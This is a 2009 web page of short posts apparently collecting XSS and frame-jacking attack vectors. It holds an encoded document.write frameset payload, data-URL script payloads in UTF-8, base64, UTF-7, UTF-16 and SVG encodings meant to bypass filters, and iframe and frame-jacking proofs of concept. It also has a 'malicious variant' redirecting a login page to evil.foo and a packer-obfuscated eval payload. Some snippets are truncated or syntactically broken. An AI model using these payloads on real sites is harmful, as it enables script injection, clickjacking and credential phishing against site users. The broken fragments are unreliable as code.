<script type="text/javascript">document.write(unescape("%3Cframeset%20rows%3D%22100%25%22%3E%0A%3C%21--%20wtf%20%3F%3F%20frame%20jacking%20%3F%20--%3E%0A%3Cframe%20noresize%3D%22noresize%22%20frameborder%3D%220%22%20title%3D%22poc%20frame%20jacking%22%20src%3D%22http%3A%2F%2Ffoo.proxy%22%3E%0A%3C%21--%20its%20time%20to%20bypass%20filters%20--%3E%0A%3C%2Fframe%3E%0A%3C%2Fframeset%3E"));</script>

Frame Jacking using write javascript function

<script language="JavaScript" type="text/javascript">
';
str+='<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http://foo.proxy">';
str+='';
str+='</frame>';
str+='</frameset>';
document.write(str);
}
writeJS();
//-->
</script>

May 02, 2009 - 09:11 PM
p3Lo

data url remasterisation

<a href="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e">test</a>
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e"></iframe>
<script>document.location=data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e</script>
etc...

May 02, 2009 - 09:09 PM
p3Lo

data url variants

Utf8 data url
data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e

Base64 data url
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTtoaXN0b3J5LmJhY2soKTs8L3NjcmlwdD4=

UTF7 data url
data:text/html;charset=utf-7,+ADw-script+AD4-alert(1)+ADs-history.back()+ADsAPA-/script+AD4-

UTF-16 in BASE64/UTF-7/UTF-8 mixture
data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg+-alert(1);history.back()+ADs-</script>

UTF-16 in BASE64
data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5AC4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPg==+-

UTF-7 in BASE64
data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KDEpK0FEcy1oaXN0b3J5LmJhY2soKStBRHNBUEEtL3NjcmlwdCtBRDQt

obfuscated UTF-7 in BASE64
data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KDEpK0FEcy1oaXN0b3J5LmJhY2soKStBRHNBUEEtL3NjcmlwdCtBRDQt

Image svg+xml in base64
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==

May 02, 2009 - 09:07 PM
p3Lo

Simple Iframe Jacking Proof of Concept :

<body TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">

<iframe src="http://foo.proxy" name="poc iframe jacking" width="100%" height="100%" scrolling="auto" frameborder="no">
</iframe>

May 02, 2009 - 09:06 PM
p3Lo

Simple Frame Jacking Proof of Concept:

<frameset rows="100%">

<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http://foo.proxy">

</frame>
</frameset>

April 23, 2009 - 03:55 PM
p3lo

To secure a login page
if (top.frames.length!=0) top.location=self.document.location;

Malicious Variants:
if (top.frames.length!=0) top.location=self.document.location;

document.location="http://evil.foo/login.php";

April 19, 2009 - 10:56 AM
p3Lo

April 15, 2009 - 08:50 AM
p3Lo

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0(1);',2,2,'alert1337'.split(''),0,{}))

Can be used with javascript: or data url encoding content.

Page #1 of 1

PHP Vectors Sender By p3Lo · Home